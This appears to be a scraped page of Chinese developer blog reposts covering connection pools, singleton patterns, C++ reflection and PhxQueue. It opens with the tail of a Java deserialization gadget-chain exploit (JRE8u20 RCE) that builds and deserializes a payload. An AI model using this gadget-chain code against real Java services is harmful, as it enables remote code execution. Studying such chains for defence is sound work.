TCObject(ser);        TCClassDesc linkedhashsetDesc = new TCClassDesc("java.util.LinkedHashSet");        TCObject.ObjectData linkedhashsetData = new TCObject.ObjectData();        TCClassDesc hashsetDesc = new TCClassDesc("java.util.HashSet");        hashsetDesc.addField(new TCClassDesc.Field("fake", BeanContextSupport.class));        TCObject.ObjectData hashsetData = new TCObject.ObjectData();        hashsetData.addData(makeBeanContextSupport(handler, ser));        hashsetData.addData(10, true); // capacity        hashsetData.addData(1.0f, true); // loadFactor        hashsetData.addData(2, true); // size        hashsetData.addData(templates);        TCObject proxy = Util.makeProxy(new Class[]{Map.class}, handler, ser);        hashsetData.addData(proxy);        linkedHashset.addClassDescData(linkedhashsetDesc, linkedhashsetData);        linkedHashset.addClassDescData(hashsetDesc, hashsetData, true);        ser.addObject(linkedHashset);        ser.write("/tmp/ser");        ObjectInputStream in = new ObjectInputStream(new FileInputStream(new File("/tmp/ser")));        System.out.println(in.readObject());    }}

参考资料

http://wouter.coekaerts.be/2015/annotationinvocationhandler

这一篇资料帮助非常大,整个 payload 的思路就是这篇文章提出来的。作者对序列化机制有长时间的深入研究。

https://gist.github.com/frohoff/24af7913611f8406eaf3

https://github.com/pwntester/JRE8u20\_RCE\_Gadget

本文转载自: 掘金

开发者博客 – 和开发相关的 这里全都有

一文读懂连接池技术原理、设计与实现(Python)

发表于 2017-11-23

(点击上方公众号,可快速关注一起学Python)

如有好Python相关文章欢迎投稿至lansebolang2008@163.com

原创转载均可,转载稿请获取作者授权转载

概述

连接池的作用就是为了提高性能,将已经创建好的连接保存在池中,当有请求来时,直接使用已经创建好的连接对Server端进行访问。这样省略了创建连接和销毁连接的过程(TCP连接建立时的三次握手和销毁时的四次握手),从而在性能上得到了提高。

连接池设计的基本原理是这样的: (1)建立连接池对象(服务启动)。 (2)按照事先指定的参数创建初始数量的连接(即:空闲连接数)。 (3)对于一个访问请求,直接从连接池中得到一个连接。如果连接池对象中没有空闲的连接,且连接数没有达到最大(即:最大活跃连接数),创建一个新的连接;如果达到最大,则设定一定的超时时间,来获取连接。 (4)运用连接访问服务。 (5)访问服务完成,释放连接(此时的释放连接,并非真正关闭,而是将其放入空闲队列中。如实际空闲连接数大于初始空闲连接数则释放连接)。

(6)释放连接池对象(服务停止、维护期间,释放连接池对象,并释放所有连接)。

说的通俗点,可以把连接池理解为一个一个的管道,在管道空闲时,便可以取出使用;同时,也可以铺设新的管道(当然不能超过最大连接数的限制)。使用完之后,管道就变为空闲了。

通常比较常用的连接池是数据库连接池,HTTP Client连接池,我也自己编写过连接池,如Thrift连接池及插入Rabbitmq队列的连接池。

下面分析三个典型的连接池的设计。

数据库连接池

首先剖析一下数据库连接池的设计与实现的原理。DBUtils 属于数据库连接池实现模块,用于连接DB-API 2模块,对数据库连接线程化,使可以安全和高效的访问数据库的模块。本文主要分析一下PooledDB的流程。

DBUtils.PooledDB使用DB-API 2模块实现了一个强硬的、线程安全的、有缓存的、可复用的数据库连接。

如下图展示了使用PooledDB时的工作流程:

本文主要考虑dedicated connections,即专用数据库连接,在初始化时连接池时,就需要指定mincached、maxcached以及maxconnections等参数,分别表示连接池的最小连接数、连接池的最大连接数以及系统可用的最大连接数,同时,blocking参数表征了当获取不到连接的时候是阻塞等待获取连接还是返回异常:

1
复制代码if not blocking:    def wait():        raise TooManyConnections    self._condition.wait = wait

在连接池初始化时,就会建立mincached个连接,代码如下:

1
复制代码# Establish an initial number of idle database connections:idle = [self.dedicated_connection() for i in range(mincached)]while idle:    idle.pop().close()

里面有close方法,看一下连接close方法的实现:

1
复制代码def close(self):    """Close the pooled dedicated connection."""    # Instead of actually closing the connection,    # return it to the pool for future reuse.    if self._con:        self._pool.cache(self._con)        self._con = None

主要是实现了cache方法,看一下具体代码:

1
复制代码def cache(self, con):    """Put a dedicated connection back into the idle cache."""    self._condition.acquire()    try:        if not self._maxcached or len(self._idle_cache) < self._maxcached:            con._reset(force=self._reset) # rollback possible transaction            # the idle cache is not full, so put it there            self._idle_cache.append(con) # append it to the idle cache        else: # if the idle cache is already full,            con.close() # then close the connection        self._connections -= 1        self._condition.notify()    finally:        self._condition.release()

由上述代码可见,close并不是把连接关闭,而是在连接池的数目小于maxcached的时候,将连接放回连接池,而大于此值时,关闭该连接。同时可以注意到,在放回连接池之前,需要将事务进行回滚,避免在使用连接池的时候有存活的事务没有提交。这可以保证进入连接池的连接都是可用的。

而获取连接的过程正如之前讨论的,先从连接池中获取连接,如果获取连接失败,则新建立连接:

1
复制代码# try to get a dedicated connection    self._condition.acquire()    try:        while (self._maxconnections                and self._connections >= self._maxconnections):            self._condition.wait()        # connection limit not reached, get a dedicated connection        try: # first try to get it from the idle cache            con = self._idle_cache.pop(0)        except IndexError: # else get a fresh connection            con = self.steady_connection()        else:            con._ping_check() # check connection        con = PooledDedicatedDBConnection(self, con)        self._connections += 1    finally:        self._condition.release()

关闭连接正如刚刚创建mincached个连接后关闭连接的流程,在连接池的数目小于maxcached的时候,将连接放回连接池,而大于此值时,关闭该连接。

RabbitMQ队列插入消息连接池

异步消息传递是高并发系统常用的一种技术手段。而这其中就少不了消息队列。频繁的向消息队列里面插入消息,建立连接释放连接会是比较大的开销。所以,可以使用连接池来提高系统性能。

连接池的设计实现如下:

在获取连接的时候,先从队列里面获取连接,如果获取不到,则新建立一个连接,如果不能新建立连接,则根据超时时间,阻塞等待从队列里面获取链接。如果没成功,则做最后的尝试,重新建立连接。代码实现如下:

1
复制代码    def get_connection_pipe(self):        """        获取连接        :return:        """        try:            connection_pipe = self._queue.get(False)        except Queue.Empty:            try:                connection_pipe = self.get_new_connection_pipe()            except GetConnectionException:                timeout = self.timeout                try:                    connection_pipe = self._queue.get(timeout=timeout)                except Queue.Empty:                    try:                        connection_pipe = self.get_new_connection_pipe()                    except GetConnectionException:                        logging.error("Too much connections, Get Connection Timeout!")        if (time.time() - connection_pipe.use_time) > self.disable_time:            self.close(connection_pipe)            return self.get_connection_pipe()        return connection_pipe

一个RabbitMQ插入消息队列的完整连接池设计如下:

1
复制代码# coding:utf-8import loggingimport threadingimport Queuefrom kombu import Connectionimport timeclass InsertQueue():    def __init__(self, host=None, port=None, virtual_host=None, heartbeat_interval=3, name=None, password=None,                 logger=None, maxIdle=10, maxActive=50, timeout=30, disable_time=20):        """        :param str host: Hostname or IP Address to connect to        :param int port: TCP port to connect to        :param str virtual_host: RabbitMQ virtual host to use        :param int heartbeat_interval:  How often to send heartbeats        :param str name: auth credentials name        :param str password: auth credentials password        """        self.logger = logging if logger is None else logger        self.host = host        self.port = port        self.virtual_host = virtual_host        self.heartbeat_interval = heartbeat_interval        self.name = name        self.password = password        self.mutex = threading.RLock()        self.maxIdle = maxIdle        self.maxActive = maxActive        self.available = self.maxActive        self.timeout = timeout        self._queue = Queue.Queue(maxsize=self.maxIdle)        self.disable_time = disable_time    def get_new_connection_pipe(self):        """        产生新的队列连接        :return:        """        with self.mutex:            if self.available <= 0:                raise GetConnectionException            self.available -= 1        try:            conn = Connection(hostname=self.host,                              port=self.port,                              virtual_host=self.virtual_host,                              heartbeat=self.heartbeat_interval,                              userid=self.name,                              password=self.password)            producer = conn.Producer()            return ConnectionPipe(conn, producer)        except:            with self.mutex:                self.available += 1            raise GetConnectionException    def get_connection_pipe(self):        """        获取连接        :return:        """        try:            connection_pipe = self._queue.get(False)        except Queue.Empty:            try:                connection_pipe = self.get_new_connection_pipe()            except GetConnectionException:                timeout = self.timeout                try:                    connection_pipe = self._queue.get(timeout=timeout)                except Queue.Empty:                    try:                        connection_pipe = self.get_new_connection_pipe()                    except GetConnectionException:                        logging.error("Too much connections, Get Connection Timeout!")        if (time.time() - connection_pipe.use_time) > self.disable_time:            self.close(connection_pipe)            return self.get_connection_pipe()        return connection_pipe    def close(self, connection_pipe):        """        close the connection and the correlative channel        :param connection_pipe:        :return:        """        with self.mutex:            self.available += 1            connection_pipe.close()        return    def insert_message(self, exchange=None, body=None, routing_key='', mandatory=True):        """        insert message to queue        :param str exchange: exchange name        :param str body: message        :param str routing_key: routing key        :param bool mandatory: is confirm: True means confirm, False means not confirm        :return:        """        put_into_queue_flag = True        insert_result = False        connection_pipe = None        try:            connection_pipe = self.get_connection_pipe()            producer = connection_pipe.channel            use_time = time.time()            producer.publish(exchange=exchange,                                             body=body,                                             delivery_mode=2,                                             routing_key=routing_key,                                             mandatory=mandatory                                             )            insert_result = True        except Exception:            insert_result = False            put_into_queue_flag = False        finally:            if put_into_queue_flag is True:                try:                    connection_pipe.use_time = use_time                    self._queue.put_nowait(connection_pipe)                except Queue.Full:                    self.close(connection_pipe)            else:                if connection_pipe is not None:                    self.close(connection_pipe)        return insert_resultclass ConnectionPipe(object):    """    connection和channel对象的封装    """    def __init__(self, connection, channel):        self.connection = connection        self.channel = channel        self.use_time = time.time()    def close(self):        try:            self.connection.close()        except Exception as ex:            passclass GetConnectionException():    """    获取连接异常    """    pass

Thrift连接池

Thrift是什么呢?简而言之,Thrift定义一个简单的文件,包含数据类型和服务接口,以作为输入文件,编译器生成代码用来方便地生成RPC客户端和服务器通信的方式。实际上就是一种远程调用的方式,因为协议栈为TCP层,所以相对于HTTP层效率会更高。

Thrift连接池的设计同数据库连接池类似,流程图如下:

思路依旧是,在获取连接时,先从连接池中获取连接,若池中无连接,则判断是否可以新建连接,若不能新建连接,则阻塞等待连接。

在从池中获取不到队列的时候的处理方式,本设计处理方式为:当获取不到连接时,将这部分请求放入一个等待队列,等待获取连接;而当关闭连接放回连接池时,优先判断这个队列是否有等待获取连接的请求,若有,则优先分配给这些请求。

获取不到连接时处理代码如下,将请求放入一个队列进行阻塞等待获取连接:

1
复制代码async_result = AsyncResult()self.no_client_queue.appendleft(async_result)client = async_result.get()  # blocking

而当有连接释放需要放回连接池时,需要优先考虑这部分请求,代码如下:

1
复制代码def put_back_connections(self, client):    """    线程安全    将连接放回连接池,逻辑如下:    1、如果有请求尚未获取到连接,请求优先    2、如果连接池中的连接的数目小于maxIdle,则将该连接放回连接池    3、关闭连接    :param client:    :return:    """    with self.lock:        if self.no_client_queue.__len__() > 0:            task = self.no_client_queue.pop()            task.set(client)        elif self.connections.__len__() < self.maxIdle:            self.connections.add(client)        else:            client.close()            self.pool_size -= 1

最后,基于thrift连接池,介绍一个简单的服务化框架的实现。

服务化框架分为两部分:RPC、注册中心。

1、RPC:远程调用,远程调用的传输协议有很多种,可以走http、Webservice、TCP等。Thrift也是世界上主流的RPC框架。其重点在于安全、快速、最好能跨语言。

2、注册中心:用于存放,服务的IP地址和端口信息等。比较好的存放服务信息的方案有:Zookeeper、Redis等。其重点在于避免单点问题,并且好维护。

通常的架构图为:

通过Thrift连接池作为客户端,而Zookeeper作为注册中心,设计服务框架。具体就是服务端在启动服务的时候到Zookeeper进行注册,而客户端在启动的时候通过Zookeeper发现服务端的IP和端口,通过Thrift连接池轮询建立连接访问服务端的服务。

具体设计的代码如下,代码有点长,细细研读一定有所收获的:

1
复制代码# coding: utf-8import threadingfrom collections import dequeimport loggingimport socketimport timefrom kazoo.client import KazooClientfrom thriftpy.protocol import TBinaryProtocolFactoryfrom thriftpy.transport import (    TBufferedTransportFactory,    TSocket,)from gevent.event import AsyncResultfrom gevent import Timeoutfrom error import CTECThriftClientErrorfrom thriftpy.thrift import TClientfrom thriftpy.transport import TTransportExceptionclass ClientPool:    def __init__(self, service, server_hosts=None, zk_path=None, zk_hosts=None, logger=None, max_renew_times=3, maxActive=20,                 maxIdle=10, get_connection_timeout=30, socket_timeout=30, disable_time=3):        """        :param service: Thrift的Service名称        :param server_hosts: 服务提供者地址,数组类型,['ip:port','ip:port']        :param zk_path: 服务提供者在zookeeper中的路径        :param zk_hosts: zookeeper的host地址,多个请用逗号隔开        :param max_renew_times: 最大重连次数        :param maxActive: 最大连接数        :param maxIdle: 最大空闲连接数        :param get_connection_timeout:获取连接的超时时间        :param socket_timeout: 读取数据的超时时间        :param disable_time: 连接失效时间        """        # 负载均衡队列        self.load_balance_queue = deque()        self.service = service        self.lock = threading.RLock()        self.max_renew_times = max_renew_times        self.maxActive = maxActive        self.maxIdle = maxIdle        self.connections = set()        self.pool_size = 0        self.get_connection_timeout = get_connection_timeout        self.no_client_queue = deque()        self.socket_timeout = socket_timeout        self.disable_time = disable_time        self.logger = logging if logger is None else logger        if zk_hosts:            self.kazoo_client = KazooClient(hosts=zk_hosts)            self.kazoo_client.start()            self.zk_path = zk_path            self.zk_hosts = zk_hosts            # 定义Watcher            self.kazoo_client.ChildrenWatch(path=self.zk_path,                                            func=self.watcher)            # 刷新连接池中的连接对象            self.__refresh_thrift_connections(self.kazoo_client.get_children(self.zk_path))        elif server_hosts:            self.server_hosts = server_hosts            # 复制新的IP地址到负载均衡队列中            self.load_balance_queue.extendleft(self.server_hosts)        else:            raise CTECThriftClientError('没有指定服务器获取方式!')    def get_new_client(self):        """        轮询在每个ip:port的连接池中获取连接(线程安全)        从当前队列右侧取出ip:port信息,获取client        将连接池对象放回到当前队列的左侧        请求或连接超时时间,默认30秒        :return:        """        with self.lock:            if self.pool_size < self.maxActive:                try:                    ip = self.load_balance_queue.pop()                except IndexError:                    raise CTECThriftClientError('没有可用的服务提供者列表!')                if ip:                    self.load_balance_queue.appendleft(ip)                    # 创建新的thrift client                    t_socket = TSocket(ip.split(':')[0], int(ip.split(':')[1]),                                       socket_timeout=1000 * self.socket_timeout)                    proto_factory = TBinaryProtocolFactory()                    trans_factory = TBufferedTransportFactory()                    transport = trans_factory.get_transport(t_socket)                    protocol = proto_factory.get_protocol(transport)                    transport.open()                    client = TClient(self.service, protocol)                    self.pool_size += 1                return client            else:                return None    def close(self):        """        关闭所有连接池和zk客户端        :return:        """        if getattr(self, 'kazoo_client', None):            self.kazoo_client.stop()    def watcher(self, children):        """        zk的watcher方法,负责检测zk的变化,刷新当前双端队列中的连接池        :param children: 子节点,即服务提供方的列表        :return:        """        self.__refresh_thrift_connections(children)    def __refresh_thrift_connections(self, children):        """        刷新服务提供者在当前队列中的连接池信息(线程安全),主要用于zk刷新        :param children:        :return:        """        with self.lock:            # 清空负载均衡队列            self.load_balance_queue.clear()            # 清空连接池            self.connections.clear()            # 复制新的IP地址到负载均衡队列中            self.load_balance_queue.extendleft(children)    def __getattr__(self, name):        """        函数调用,最大重试次数为max_renew_times        :param name:        :return:        """        def method(*args, **kwds):            # 从连接池获取连接            client = self.get_client_from_pool()            # 连接池中无连接            if client is None:                # 设置获取连接的超时时间                time_out = Timeout(self.get_connection_timeout)                time_out.start()                try:                    async_result = AsyncResult()                    self.no_client_queue.appendleft(async_result)                    client = async_result.get()  # blocking                except:                    with self.lock:                        if client is None:                            self.no_client_queue.remove(async_result)                            self.logger.error("Get Connection Timeout!")                finally:                    time_out.cancel()            if client is not None:                for i in xrange(self.max_renew_times):                    try:                        put_back_flag = True                        client.last_use_time = time.time()                        fun = getattr(client, name, None)                        return fun(*args, **kwds)                    except socket.timeout:                        self.logger.error("Socket Timeout!")                        # 关闭连接,不关闭会导致乱序                        put_back_flag = False                        self.close_one_client(client)                        break                    except TTransportException, e:                        put_back_flag = False                        if e.type == TTransportException.END_OF_FILE:                            self.logger.warning("Socket Connection Reset Error,%s", e)                            with self.lock:                                client.close()                                self.pool_size -= 1                                client = self.get_new_client()                        else:                            self.logger.error("Socket Error,%s", e)                            self.close_one_client(client)                            break                    except socket.error, e:                        put_back_flag = False                        if e.errno == socket.errno.ECONNABORTED:                            self.logger.warning("Socket Connection aborted Error,%s", e)                            with self.lock:                                client.close()                                self.pool_size -= 1                                client = self.get_new_client()                        else:                            self.logger.error("Socket Error, %s", e)                            self.close_one_client(client)                            break                    except Exception as e:                        put_back_flag = False                        self.logger.error("Thrift Error, %s", e)                        self.close_one_client(client)                        break                    finally:                        # 将连接放回连接池                        if put_back_flag is True:                            self.put_back_connections(client)            return None        return method    def close_one_client(self, client):        """        线程安全        关闭连接        :param client:        :return:        """        with self.lock:            client.close()            self.pool_size -= 1    def put_back_connections(self, client):        """        线程安全        将连接放回连接池,逻辑如下:        1、如果有请求尚未获取到连接,请求优先        2、如果连接池中的连接的数目小于maxIdle,则将该连接放回连接池        3、关闭连接        :param client:        :return:        """        with self.lock:            if self.no_client_queue.__len__() > 0:                task = self.no_client_queue.pop()                task.set(client)            elif self.connections.__len__() < self.maxIdle:                self.connections.add(client)            else:                client.close()                self.pool_size -= 1    def get_client_from_pool(self):        """        线程安全        从连接池中获取连接,若连接池中有连接,直接取出,否则,        新建一个连接,若一直无法获取连接,则返回None        :return:        """        client = self.get_one_client_from_pool()        if client is not None and (time.time() - client.last_use_time) < self.disable_time:            return client        else:            if client is not None:                self.close_one_client(client)        client = self.get_new_client()        if client is not None:            return client        return None    def get_one_client_from_pool(self):        """        线程安全        从连接池中获取一个连接,若取不到连接,则返回None        :return:        """        with self.lock:            if self.connections:                try:                    return self.connections.pop()                except KeyError:                    return None            return None

推荐阅读

  • Python实现成语接龙
  • 建立爬虫代理IP池
  • “火柴棍式”程序员面试题
  • Python time模块学习
  • 如何计算钱币找零问题?
  • GitHub上最火的Python开源项目
  • 一道微软面试题
  • 力荐!Python的14张思维导图

看完本文有收获?请转 发分享给更多人

关注「P ython那些事」,做全栈开发工程师

本文转载自: 掘金

开发者博客 – 和开发相关的 这里全都有

面试中单例模式有几种写法? 饱汉模式 饿汉模式 Holder

发表于 2017-11-23

“你知道茴香豆的‘茴’字有几种写法吗?”

纠结单例模式有几种写法有用吗?有点用,面试中经常选择其中一种或几种写法作为话头,考查设计模式和coding style的同时,还很容易扩展到其他问题。这里讲解几种猴哥常用的写法,但切忌生搬硬套,去记“茴香豆的写法”。编程最大的乐趣在于“know everything, control everything”。

JDK版本:oracle java 1.8.0_102

大体可分为4类,下面分别介绍他们的基本形式、变种及特点。

饱汉模式

饱汉是变种最多的单例模式。我们从饱汉出发,通过其变种逐渐了解实现单例模式时需要关注的问题。

基础的饱汉

饱汉,即已经吃饱,不着急再吃,饿的时候再吃。所以他就先不初始化单例,等第一次使用的时候再初始化,即“懒加载”。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
复制代码// 饱汉
// UnThreadSafe
public class Singleton1 {
private static Singleton1 singleton = null;

private Singleton1() {
}

public static Singleton1 getInstance() {
if (singleton == null) {
singleton = new Singleton1();
}
return singleton;
}
}

饱汉模式的核心就是懒加载。好处是更启动速度快、节省资源,一直到实例被第一次访问,才需要初始化单例;小坏处是写起来麻烦,大坏处是线程不安全,if语句存在竞态条件。

写起来麻烦不是大问题,可读性好啊。因此,单线程环境下,基础饱汉是猴哥最喜欢的写法。但多线程环境下,基础饱汉就彻底不可用了。下面的几种变种都在试图解决基础饱汉线程不安全的问题。

饱汉 - 变种 1

最粗暴的犯法是用synchronized关键字修饰getInstance()方法,这样能达到绝对的线程安全。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
复制代码// 饱汉
// ThreadSafe
public class Singleton1_1 {
private static Singleton1_1 singleton = null;

private Singleton1_1() {
}

public synchronized static Singleton1_1 getInstance() {
if (singleton == null) {
singleton = new Singleton1_1();
}
return singleton;
}
}

变种1的好处是写起来简单,且绝对线程安全;坏处是并发性能极差,事实上完全退化到了串行。单例只需要初始化一次,但就算初始化以后,synchronized的锁也无法避开,从而getInstance()完全变成了串行操作。性能不敏感的场景建议使用。

饱汉 - 变种 2

变种2是“臭名昭著”的DCL 1.0。

针对变种1中单例初始化后锁仍然无法避开的问题,变种2在变种1的外层又套了一层check,加上synchronized内层的check,即所谓“双重检查锁”(Double Check Lock,简称DCL)。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
复制代码// 饱汉
// UnThreadSafe
public class Singleton1_2 {
private static Singleton1_2 singleton = null;

private Singleton1_2() {
}

public static Singleton1_2 getInstance() {
// may get half object
if (singleton == null) {
synchronized (Singleton1_2.class) {
if (singleton == null) {
singleton = new Singleton1_2();
}
}
}
return singleton;
}
}

变种2的核心是DCL,看起来变种2似乎已经达到了理想的效果:懒加载+线程安全。可惜的是,正如注释中所说,DCL仍然是线程不安全的,由于指令重排序,你可能会得到“半个对象”。详细在看完变种3后,可参考猴子之前的一篇文章,这里不再赘述。

参考:volatile关键字的作用、原理

饱汉 - 变种 3

变种3专门针对变种2,可谓DCL 2.0。

针对变种3的“半个对象”问题,变种3在instance上增加了volatile关键字,原理见上述参考。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
复制代码// 饱汉
// ThreadSafe
public class Singleton1_3 {
private static volatile Singleton1_3 singleton = null;

private Singleton1_3() {
}

public static Singleton1_3 getInstance() {
if (singleton == null) {
synchronized (Singleton1_3.class) {
// must be a complete instance
if (singleton == null) {
singleton = new Singleton1_3();
}
}
}
return singleton;
}
}

多线程环境下,变种3更适用于性能敏感的场景。但后面我们将了解到,就算是线程安全的,还有一些办法能破坏单例。

饿汉模式

与饱汉相对,饿汉很饿,只想着尽早吃到。所以他就在最早的时机,即类加载时初始化单例,以后访问时直接返回即可。

1
2
3
4
5
6
7
8
9
10
11
12
复制代码// 饿汉
// ThreadSafe
public class Singleton2 {
private static final Singleton2 singleton = new Singleton2();

private Singleton2() {
}

public static Singleton2 getInstance() {
return singleton;
}
}

饿汉的好处是天生的线程安全(得益于类加载机制),写起来超级简单,使用时没有延迟;坏处是有可能造成资源浪费(如果类加载后就一直不使用单例的话)。

值得注意的时,单线程环境下,饿汉与饱汉在性能上没什么差别;但多线程环境下,由于饱汉需要加锁,饿汉的性能反而更优。

Holder模式

我们既希望利用饿汉模式中静态变量的方便和线程安全;又希望通过懒加载规避资源浪费。Holder模式满足了这两点要求:核心仍然是静态变量,足够方便和线程安全;通过静态的Holder类持有真正实例,间接实现了懒加载。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
复制代码// Holder模式
// ThreadSafe
public class Singleton3 {
private static class SingletonHolder {
private static final Singleton3 singleton = new Singleton3();

private SingletonHolder() {
}
}


private Singleton3() {
}

/**
* 勘误:多写了个synchronized。。
public synchronized static Singleton3 getInstance() {
return SingletonHolder.singleton;
}
*/

public static Singleton3 getInstance() {
return SingletonHolder.singleton;
}
}

相对于饿汉模式,Holder模式仅增加了一个静态内部类的成本,与饱汉的变种3效果相当(略优),都是比较受欢迎的实现方式。同样建议考虑。

枚举模式

用枚举实现单例模式,相当好用,但可读性是不存在的。

基础的枚举

将枚举的静态成员变量作为单例的实例:

1
2
3
4
5
复制代码// 枚举
// ThreadSafe
public enum Singleton4 {
SINGLETON;
}

代码量比饿汉模式更少。但用户只能直接访问实例Singleton4.SINGLETON——事实上,这样的访问方式作为单例使用也是恰当的,只是牺牲了静态工厂方法的优点,如无法实现懒加载。

丑陋但好用的语法糖

Java的枚举是一个“丑陋但好用的语法糖”。

枚举型单例模式的本质

通过反编译(jad,源码|String拼接操作”+”的优化?也用到了)打开语法糖,就看到了枚举类型的本质,简化如下:

1
2
3
4
5
6
7
复制代码// 枚举
// ThreadSafe
public class Singleton4 extends Enum<Singleton4> {
...
public static final Singleton4 SINGLETON = new Singleton4();
...
}

本质上和饿汉模式相同,区别仅在于公有的静态成员变量。

用枚举实现一些trick

这一部分与单例没什么关系,可以跳过。如果选择阅读也请认清这样的事实:虽然枚举相当灵活,但如何恰当的使用枚举有一定难度。一个足够简单的典型例子是TimeUnit类,建议有时间耐心阅读。

上面已经看到,枚举型单例的本质仍然是一个普通的类。实际上,我们可以在枚举型型单例上增加任何普通类可以完成的功能。要点在于枚举实例的初始化,可以理解为实例化了一个匿名内部类。为了更明显,我们在Singleton4_1中定义一个普通的私有成员变量,一个普通的公有成员方法,和一个公有的抽象成员方法,如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
复制代码// 枚举
// ThreadSafe
public enum Singleton4_1 {
SINGLETON("enum is the easiest singleton pattern, but not the most readable") {
public void testAbsMethod() {
print();
System.out.println("enum is ugly, but so flexible to make lots of trick");
}
};

private String comment = null;

Singleton4_1(String comment) {
this.comment = comment;
}

public void print() {
System.out.println("comment=" + comment);
}

abstract public void testAbsMethod();


public static Singleton4_1 getInstance() {
return SINGLETON;
}
}

这样,枚举类Singleton4_1中的每一个枚举实例不仅继承了父类Singleton4_1的成员方法print(),还必须实现父类Singleton4_1的抽象成员方法testAbsMethod()。

总结

上面的分析都忽略了反射和序列化的问题。通过反射或序列化,我们仍然能够访问到私有构造器,创建新的实例破坏单例模式。此时,只有枚举模式能天然防范这一问题。反射和序列化猴子还不太了解,但基本原理并不难,可以在其他模式上手动实现。

下面继续忽略反射和序列化的问题,做个总结回味一下:

实现方式 关键点 资源浪费 线程安全 多线程环境的性能足够优化
基础饱汉 懒加载 否 否 -
饱汉变种1 懒加载、同步 否 是 否
饱汉变种2 懒加载、DCL 否 否 -
饱汉变种3 懒加载、DCL、volatile 否 是 是
饿汉 静态变量初始化 是 是 是
Holder 静态变量初始化、holder 否 是 是
枚举 枚举本质、静态变量初始化 否 是 是

单例模式是面试中的常考点,写起来非常简单。一方面考查正确性,看本文分析;一方面考查coding style,参考:程序猿应该记住的几条基本规则


本文链接:面试中单例模式有几种写法?
作者:猴子007
出处:monkeysayhi.github.io
本文基于 知识共享署名-相同方式共享 4.0 国际许可协议发布,欢迎转载,演绎或用于商业目的,但是必须保留本文的署名及链接。

本文转载自: 掘金

开发者博客 – 和开发相关的 这里全都有

用继承和反射机制实现业务扩展

发表于 2017-11-22

以前学 C++ 的时候,总是听说可以用继承和基类指针去扩展业务逻辑,而对整体项目架构的侵入很小。其实对这里理解并不深。最近在看其他同学写的搜索引擎新框架时,发现这种设计可以将系统框架和业务逻辑完全解耦开。于是决定实现一下。


基本操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
复制代码class BaseModule
{
public:
virtual ~BaseModule();

virtual string GetData();
};

class BusinessModuleA: public BaseModule
{
public:
virtual string GetData(); // 卖出 00700.HK
};

class BusinessModuleB: public BaseModule
{
public:
virtual string GetData(); // 签下 Playerunknown's Battlegrounds
};

int main
{
// PartA,使用 ModuleA 处理
BaseModule * module_a = new BusinessModuleA();
cout << module_a->GetData() << endl;

// PartB,使用 ModuleB 处理
BaseModule * module_b = new BusinessModuleB();
cout << module_b->GetData() << endl;
}

先定义一个 BaseModule 类,里面有一个虚成员函数 GetData(),它负责处理所有的业务逻辑,在 BaseModule 中不实现。再定义一个 BusinessModuleA 类,它继承自 BaseModule 类,这个类实现了自己的 GetData() 方法,比如在这个方法中卖出所有的 00700.HK,并返回当天的收益。同理,再定义一个 BusinessModuleB 类,它也实现了自己的 GetData() 方法,比如在这个方法中签下「Playerunknown’s
Battlegrounds」,并返回在国服上线的日期。

在使用时,用两个基类指针分别指向新建的 BusinessModuleA、BusinessModuleB 实例。为什么用基类指针呢?因为基类指针的命名(尽管子类名不同,但基类指针都是一个名)和行为(调用虚成员函数)是统一的,在 module_a->GetData() 进行调用时,编译器会自动去分辨到底使用哪个子类的方法。

这样做的好处是什么呢,我们可以将只含 PartA 的代码编译成二进制放在 mmstock1 线上机器上作为股票业务的服务,将只含有 PartB 的代码生成的二进制放在 mmgame1 机器上作为游戏业务的服务。如果仅仅是这样似乎没有必要搞这么复杂,单独分开去写代码也可以。 但如果 BaseModule 类中还有其他大量的逻辑,比如处理网络连接、监控服务状态、收集错误日志呢。这些公用的方法被放在了基类中,而独特的业务逻辑被抽出来放在了各自的子类里。

现在新开展一个业务,只需要新建一个子类继承 BaseModule,在 GetData() 类中实现业务,最后在 main 函数中修改为 new 这个子类即可。

但这种方式有一些问题,

1、需要在入口文件中添加新增业务的头文件

2、main 方法中的代码是属于系统框架的,不能每次新增业务都去改动框架代码


还是基本操作

因而需要引入反射机制来改善上面的缺点,整个 repo 位于 how-to-extend-business。还是基本操作,都坐下。

C++ 本身不支持反射,只能去模拟这种机制,即用类名去获取类的实例。需要做到下面两方面:

1、有一个单例类,其成员变量 map<string, Creator> m_creator_registry 存放(类名,创建对应类实例的函数指针)

2、每一个独立业务的子类中,实现自己的 Creator,即返回子类实例的函数

3、每一个独立业务的子类中,向 m_creator_registry 注册

如使用 gcc -E -C business_a.cpp > out.txt 查看

REGISTER_MODULE(BusinessModuleA, "BusinessModuleA"); 这一行

宏展开后的结果,就是实现了 2 和 3 两部分。

1
2
3
4
5
6
7
8
复制代码BaseModule* ObjectCreator_register_name_BusinessModuleA()
{
return new BusinessModuleA;
}

ObjectCreatorRegister_ModuleRegister
g_object_creator_register_name_BusinessModuleA("BusinessModuleA",
ObjectCreator_register_name_BusinessModuleA);

这样改造以后,新增业务时只需要新建一个子类继承 BaseModule,在 GetData() 类中实现业务,在最后加上 REGISTER_MODULE 宏。


动态配置

在代码的 main 函数中可以看到依然要指定 GET_MODULE 中的类名

1
2
3
4
5
6
7
复制代码// 使用反射获取 ModuleA 实例
BaseModule* business_a = GET_MODULE("BusinessModuleA");
cout << business_a->GetData() << endl;

// 使用反射获取 ModuleB 实例
BaseModule* business_b = GET_MODULE("BusinessModuleB");
cout << business_b->GetData() << endl;

怎样才能完全不修改系统框架呢?

可以再加入一个配置类,配置类去读取服务器指定路径下的配置文件。这样可以在配置文件中动态修改类名了,新增一个业务,修改一下配置项即可。


参考

PUBG

00700.HK

C++ 实现通过类名来进行实例化

C++ 反射机制的简单实现

本文转载自: 掘金

开发者博客 – 和开发相关的 这里全都有

微信后台团队开源力作:PhxQueue 分布式队列

发表于 2017-11-22

PhxQueue 是微信开源的一款基于 Paxos 协议实现的高可用、高吞吐和高可靠的分布式队列,保证At-Least-Once Delivery,在微信内部广泛支持微信支付、公众平台等多个重要业务。

Github开源地址:github.com/Tencent/phx…

